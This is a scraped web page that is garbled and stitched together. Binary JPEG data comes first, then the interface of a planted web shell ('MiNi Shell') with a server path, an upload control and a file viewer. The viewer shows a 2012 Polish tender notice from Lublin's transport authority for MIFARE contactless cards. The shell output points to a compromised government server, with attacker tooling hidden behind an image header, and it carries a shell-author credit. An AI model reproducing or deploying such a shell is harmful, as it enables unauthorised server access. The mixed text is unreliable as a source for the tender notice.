JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120315/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120315/81308-N-2012.html

<p class="kh_header"><b>Lublin: Dostawa elektronicznych kart zbliżeniowych</b><br>
<b>Numer ogłoszenia: 81308 - 2012; data zamieszczenia: 15.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Transportu Miejskiego w Lublinie , ul. Kraśnicka 25, 20-718 Lublin, woj. lubelskie, tel. 0-81 466 29 00, faks 0-81 466 29 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> ztm.bip.lublin.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa elektronicznych kart zbliżeniowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
1.1.	dostawa elektronicznych kart zbliżeniowych, zgodnych ze standardami opisanymi  w normie ISO/IEC 14443 typ A, spełniających warunki certyfikatu MIFARER i wykonanych na bazie układu scalonego MF1MOA2S50 (16 sektorów pamięci) lub równoważnego;
1.2.	zamówienie obejmuje jednorazową dostawę 28 300 sztuk elektronicznych kart zbliżeniowych z jednostronnym zadrukiem technologią offsetową, drukiem w pełnym kolorze, zgodnie z uzgodnionymi wzorami graficznymi. 
2.	Wymagania techniczne i jakościowe: 
2.1.	Zabezpieczenia: 
2.1.1.	karty muszą zawierać skuteczne zabezpieczenia zgodne z normą ISO/IEC 14443;
2.1.2.	każda karta w sposób jawny winna być oznakowana unikalnym numerem odczytanym z pamięci układu scalonego w procesie drukowania. Numer na kartach musi być naniesiony trwale, z wykluczeniem próby jego zdrapania, podrobienia, starcia, poprzez użycie technologii grawerowania laserowego - niedopuszczalne jest użycie technik termo transferowych;
2.1.3.	karty muszą umożliwiać wzajemną autoidentyfikację z czytnikiem systemu działającym zgodnie z normą ISO/IEC DIS 9798-2,
2.1.4.	karta musi zawierać 16 bitowy licznik zabezpieczony sprzętowo, oraz posługiwać się protokołem bezpieczeństwa zgodnym z CRC,
2.2.	Komunikacja: 
2.2.1.	Komunikacja między kartą a czytnikiem odbywa się drogą radiową:
2.1.2.1.	częstotliwość nośna: 13,56 MHz,
2.1.2.2.	interfejs bezkontaktowy musi spełniać warunki normy ISO IEC 14443 typ A,
2.1.2.3.	szybkość komunikacji: 106 kBit/s (Kbaud),
2.1.2.4.	czas realizacji operacji: mniej niż. 170 ms,
2.1.2.5.	protokół komunikacyjny: half duplex,
2.1.2.6.	zasiąg operacyjny: do 10 cm; 
2.3.        Pamięć 
2.3.1. technologia: CMOS EEPROM,
2.3.2. pojemność: 1 kBajt [16 sektorów po 512 bitów],
2.3.3. podzielona na 16 niezależnych sektorów po 4 bloki każdy,
2.3.4. ilość cykli zapisu: minimum 100 000,
2.3.5. ilość cykli odczytu: nielimitowana,
2.3.6. okres przechowywania danych: 10 lat; 
2.4.        Zasilanie: 
2.4.1. Karta zasilana jest indukcyjnie przez czytnik;
2.4.2.  Karta nie posiada własnego źródła zasilania;
3.	Charakterystyka fizyczna: 
3.1.	karta typu MIFARE STANDARDR laminowana wielowarstwowo, etapowo (dla otrzymania minimalnej grubości i wysokiej jakości) z tworzywa sztucznego PVC nie zawierającego szkodliwych składników chemicznych, przyjazna dla środowiska zgodnie z ustawą z dnia 27.04.2001 r. Prawo ochrony środowiska (tj. DZ. U. z 2008 r. nr 25, poz. 150 z późn. zm.) oraz ustawą z dnia 27.04.2001 r. o odpadach (tj. Dz. U. z 2010 r. nr 185, poz. 1243 z późn. zm.),
3.2.	punkty połączeń anteny i układu elektronicznego wykonane w technologii termo kompresji,
3.3.	antena wykonana z drutu miedzianego,
3.4.	wymiary zgodne z normami ISO 7816-7810 (ID-1 85,7x54x0,78-0,80 mm),
3.5.	dostawca musi zagwarantować wysoką jakość połączeń elektrycznych pomiędzy anteną a układem elektronicznym w całym okresie eksploatacji karty;
4.	 Parametry wytrzymałościowe 
4.1.	całkowita - 10 lat (w warunkach normalnej eksploatacji),
4.2.	mechaniczna -zgodnie z ISO 10373 bez utraty funkcjonalności i walorów estetycznych,
4.3.	chemiczna - zgodnie z ISO 10373,
4.4.	temperaturowa - zgodnie z ISO 10373 (w zakresie temperatur od -20 do +50 nie występuje utrata funkcjonalności i walorów estetycznych),
4.5.	wilgotność względna maksymalna środowiska pracy karty: 90%;
5.	Certyfikat: 
5.1.	Wymagany jest ważny certyfikat MIFARER wydany przez instytucję uprawnioną do certyfikowania zgodności urządzeń z normą ISO/IEC 14443;
5.2.	Zamawiający nie wymaga złożenia wraz z ofertą ważnego certyfikatu MIFARER wydanego przez instytucję uprawnioną do certyfikowania zgodności urządzeń z normą ISO/IEC 14443;
5.3.	Certyfikat winien zostać przedstawiony do wglądu zamawiającemu dniu realizacji dostawy.
6.	Format nadruku numeru karty: 
6.1.	Numer Seryjny Karty interfejsu bezstykowego musi być częścią trwale zapisanych danych na etapie produkcji układu scalonego MIFARE,
6.2.	zawsze ma być to 11 cyfr zgrupowanych w dwóch ciągach rozdzielonych odstępem odpowiednio po 3 i 8 cyfr (np. 001 00000001), 
6.3.	Numer Seryjny Karty ma być zawarty w pierwszych czterech bajtach bloku 0 sektora 0,
6.4.	zamiana prezentacji ww. numeru karty na wymaganą w systemie biletu elektronicznego wymaga odczytania numeru w odwrotnej kolejności (od bajtu 4 do 1), podzielenia na dwie sekcje o długości 1 bajt i 3 bajty a następnie przekształcenia każdej sekcji na postać dziesiętną. 
6.5.	jeżeli w wyniku konwersji zapisu szesnastkowego na dziesiętny uzyskuje się numer krótszy niż trzycyfrowy dla sekcji pierwszej i ośmiocyfrowy dla sekcji drugiej, obowiązuje zasada uzupełniania takiego numeru w każdej sekcji o odpowiednią liczbę cyfr 0, dopisując je z lewej strony wyliczonego numeru,
6.6.	uzyskana postać dziesiętna Numeru Seryjnego Karty winna być nanoszona, tj. grawerowana laserowo na karcie. Sekcje Numeru Seryjnego muszą zostać oddzielone spacją,
6.7.	w przypadku stwierdzenia przez Zamawiającego niezgodności numeru graficznego karty z numerem elektronicznym karta uznana zostanie za wadliwą. 
7.	Druk:
7.1.	cały nakład kart ma być zadrukowany technologią offsetową, drukiem w pełnym kolorze. Wzór graficzny nadruku będzie zawierał elementy stałe, których układ i rozmieszczenie wskazane są w załączniku nr 2 do umowy oraz elementy zmienne - tło, tj. element graficzny w formie zdjęcia w zaznaczonym obszarze karty. Zamawiający zastrzega sobie możliwość wskazania 5 odrębnych wzorów tła. Wzory tła zostaną wskazane przez zamawiającego w dniu podpisania umowy.  
7.2.	każdy z pięciu wzorów tła będzie nadrukowany na części nakładu kart wskazanej przez odbiorcę w momencie przekazania wzorów. 
7.3.	wzory graficzne muszą być drukowane z rozdzielczością co najmniej 300 dpi,
7.4.	nadruki muszą być trwale zabezpieczone przed ścieraniem wg normy  ISO 7816 - 7810..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.23.71.31-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w III.4.3.1.), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania- wystawiony nie wcześniej niż 6 miesiące przed upływem terminu składania ofert.

2.    Prawidłowo wypełniony Formularz oferty  wg Załącznika nr 1 do s.i.w.z. W przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną.
3.   	Oświadczenia i dokumenty wymagane w części VI specyfikacji istotnych warunków zamówienia. 
4. 	Oświadczenie o części, której wykonanie, wykonawca zamierza powierzyć podwykonawcom wg Załącznik nr 4 do s.i.w.z. w przypadku powierzenia przez wykonawcę części zamówienia podwykonawcom.
5.  	Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Pzp  (dotyczy także wspólników spółki cywilnej). Treść pełnomocnictwa musí rozstrzygać, czy ustanowiony pełnomocnik jest  uprawniony do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia publicznego, czy również do zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna także identyfikować wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, jak również wskazywać ustanowionego pełnomocnika.
6. 	Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku gdy dokumentów składających się na ofertę nie podpisuje osoba uprawniona do reprezentopwania wykonawcy zgodnie z odpisem z Krajowego Rejestru Sądowego lub wykonawca- w przypadku osób fizycznych 
7. 	Pełnomocnictwo o którym mowa w pkt. 5 i 6 powinno być przedstawione w formie oryginału lub poświadczonej za zgodność z oryginałem kopii przez osoby wystawiające pełnomocnictwo, notariusza lub osoby, których uprawnienie do reprezentacji wynika z dokumentu rejstracyjnego wykonawcy, zgodnie ze sposobem reprezentacji określonym w tych dokumentach.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ztm.bip.lublin.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Transportu Miejskiego w Lublinie, al. Kraśnicka 25, 20-718 Lublin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2012 godzina 10:00, miejsce: Zarząd Transportu Miejskiego w Lublinie, al. Kraśnicka 25, 20-718 Lublin- Sekretariat pok. 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com